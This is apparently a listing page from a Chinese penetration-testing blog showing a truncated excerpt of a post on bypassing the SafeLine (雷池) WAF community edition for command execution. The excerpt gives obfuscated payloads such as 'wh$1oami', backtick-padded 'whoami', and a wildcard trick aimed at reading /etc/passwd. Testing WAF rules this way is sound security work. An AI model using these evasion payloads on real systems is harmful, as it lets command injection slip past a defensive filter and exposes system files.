雷池共1篇
雷池waf社区版命令执行绕过-渗透云记 - 专注于网络安全与技术分享

雷池waf社区版命令执行绕过

1.命令执行whoami回显 2.构造不影响解析的poc whoami 方法1 $1: wh$1oami 方法2 /;+`符号: /;w`saldkj2190`ho`12wsa2`am`foj11`i cat /etc/passwd 方法一 通配符、垃圾字符1: /;cat+/et?/pas...
沐寒的头像-渗透云记 - 专注于网络安全与技术分享初心赞助沐寒2024年4月13日 22:50
073101771